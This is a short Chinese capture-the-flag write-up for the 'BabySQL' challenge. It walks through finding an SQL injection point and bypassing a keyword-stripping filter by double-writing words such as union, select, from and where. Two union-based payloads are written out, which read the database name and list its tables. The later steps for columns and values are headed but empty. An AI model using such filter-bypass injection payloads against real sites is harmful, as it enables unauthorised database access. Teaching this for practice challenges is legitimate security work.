[极客大挑战 2019]BabySQL 1

Brucye2026-03-12 18:03

极客大挑战 2019BabySQL 1

文章目录

题目预览

基本测试

这里包数据包放到Burp的Repeater中继续进行

单引号测试报错,#号闭合回显,说明有SQL注入点

注意:这里面的空格用+号替换

查列数

回显发现过滤了or,by,回显中留下了der,判断是用replace替换过滤,后面用双写绕过

双写后继续测试

最后测试完是3列

测数据库

后续测试中过滤什么,就双写什么

sql 复制代码 
ununionion+seselectlect+1,2,database()%23

测试到数据库是geek

测数据表

sql 复制代码 
ununionion+seselectlect+1,2,group_concat(table_name)+frfromom+infoorrmation_schema.tables+whwhereere+table_schema='geek'%23

测数据字段

测字段值

完结~

相关推荐
持敬chijing3 小时前
Web渗透之SQL注入-二次注入(Second-Order SQL Injection)
sql·安全·web安全·网络安全·网络攻击模型·安全威胁分析
laoli_coding4 小时前
数据机密性保护算法汇总(国际算法)
安全·网络安全·密码学
X7x56 小时前
零信任架构:重塑数字时代安全边界的战略转型
网络安全·网络攻击模型·安全威胁分析·安全架构·零信任架构
锐速网络7 小时前
CDN加速服务怎么选?主流CDN加速平台横向对比(2026实战版)
网络安全·网络加速·高防cdn·cdn选型·cdn对比·企业级cdn
这个DBA有点耶9 小时前
时序数据库深度对比:2026 年主流 TSDB 架构演进与选型指南
数据库·sql·云原生·架构·运维开发·时序数据库
计算机安禾9 小时前
【数据库系统原理】第9篇:SQL的结构化思维:DDL、DML与DCL的职责分离
数据库·sql·oracle
超级无敌zhq9 小时前
内网横向移动实战:从单点攻破到域控沦陷
网络·安全·web安全·网络安全
lcreek9 小时前
SQL 注入实战:DVWA LOW完整测试指南
网络安全·sql注入
计算机安禾9 小时前
【数据库系统原理】第12篇:视图机制:外模式在SQL层级的逻辑数据独立性实现
数据库·sql·oracle
前进的李工9 小时前
MySQL性能优化:索引与子查询实战技巧
数据库·sql·mysql·性能优化
热门推荐
01GitHub 镜像站点02【AI】2026 年具身智能模型和世界模型总结032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04Codex 下载安装指南:Windows 和 macOS 官方版下载052026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?06【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法07Agnes AI 全模态 API 免费实测报告:文生图 + 文生视频完整测试08CC-Switch 下载、安装与使用配置指南【2026.5.29】09CC-Switch & Claude 基于 Linux 服务器安装使用指南10AI科技热点日报 | 2026年6月1日